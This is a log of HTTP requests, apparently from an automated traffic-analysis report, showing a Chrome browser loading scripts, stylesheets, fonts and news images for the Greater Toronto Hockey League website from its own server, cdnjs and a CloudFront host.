Source: global trafficHTTP traffic detected: GET /wp/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1Host: gthlcanada.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /ajax/libs/react/0.12.1/react-with-addons.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/plugins/wp-polls/polls-js.js?ver=2.7 HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/08/29093927/icons8-youtube-48-1.png HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/material-design-iconic-font/2.1.2/css/material-design-iconic-font.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/themes/base/bower_components/lodash/lodash.min.js HTTP/1.1Host: gthlcanada.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/themes/base/assets/scripts/js/slick.js HTTP/1.1Host: gthlcanada.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/themes/base/bower_components/react-mini-router/dist/react-mini-router.min.js HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/plugins/wp-polls/polls-js.js?ver=2.7 HTTP/1.1Host: gthlcanada.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/themes/base/bower_components/moment/min/moment-with-locales.min.js HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /ajax/libs/react/0.12.1/react-with-addons.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/themes/base/bower_components/moment-timezone/builds/moment-timezone-with-data.min.js HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/themes/base/bower_components/jsTimezoneDetect/jstz.min.js HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/themes/base/assets/dist/scripts/js/main.js HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/plugins/sitepress-multilingual-cms/res/js/sitepress.js?ver=4.5.3 HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/12/23150859/2025-GTHL-Playoffs-1600x900-Web-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2025/01/13092716/25-TP-Game-Move-1600x900-Web-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2025/01/07211622/DECAAA-Title-1600x900-GTHL-Power-Rankings-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2025/01/02124840/GTHL-Officials-1600x900-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2025/01/06103844/DECA-Title-1600x900-GTHL-Power-Rankings-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2025/01/06205151/DECAA-Title-1600x900-GTHL-Power-Rankings-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/material-design-iconic-font/2.1.2/fonts/Material-Design-Iconic-Font.woff2?v=2.1.0 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"Origin: https://gthlcanada.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.1.2/css/material-design-iconic-font.min.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/themes/base/bower_components/react-mini-router/dist/react-mini-router.min.js HTTP/1.1Host: gthlcanada.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/plugins/sitepress-multilingual-cms/res/js/xdomain-data.js?ver=3.3.5 HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/themes/base/bower_components/moment/min/moment-with-locales.min.js HTTP/1.1Host: gthlcanada.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/themes/base/bower_components/jsTimezoneDetect/jstz.min.js HTTP/1.1Host: gthlcanada.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /wp/wp-includes/js/wp-embed.min.js?ver=4.5.3 HTTP/1.1Host: gthlcanada.comConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/plugins/sitepress-multilingual-cms/res/js/sitepress.js?ver=4.5.3 HTTP/1.1Host: gthlcanada.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/12/17102800/Player-Movement-Website-Graphic-730x410.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2025/01/07211622/DECAAA-Title-1600x900-GTHL-Power-Rankings-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2023/06/10112443/Nothers-Big-Box.jpeg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2025/01/06205151/DECAA-Title-1600x900-GTHL-Power-Rankings-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/11/13195651/HHOF23_ShootSaveCall_300x250.gif HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/08/29093926/icons8-rss-48-1.png HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2025/01/06103844/DECA-Title-1600x900-GTHL-Power-Rankings-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/12/23150859/2025-GTHL-Playoffs-1600x900-Web-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/plugins/sitepress-multilingual-cms/res/js/xdomain-data.js?ver=3.3.5 HTTP/1.1Host: gthlcanada.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2022/10/26123500/400X350-SAFE-SPORT-COMPLAINT-PROCESS-EN-320x280.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2025/01/13092716/25-TP-Game-Move-1600x900-Web-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2025/01/02124840/GTHL-Officials-1600x900-730x411.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2023/05/02161525/START-HOCKEY-1080x1080-Start-Somewhere-320x320.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/themes/base/bower_components/moment-timezone/builds/moment-timezone-with-data.min.js HTTP/1.1Host: gthlcanada.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/themes/base/assets/dist/scripts/js/main.js HTTP/1.1Host: gthlcanada.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /wp/wp-includes/js/wp-embed.min.js?ver=4.5.3 HTTP/1.1Host: gthlcanada.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _icl_current_language=en
Source: global trafficHTTP traffic detected: GET /app/uploads/gthl/2024/01/09095632/Big-box-ad-creative-300x25012.jpg HTTP/1.1Host: d2pr6pnwfmh0za.cloudfront.netConnection: keep-alivesec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gthlcanada.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
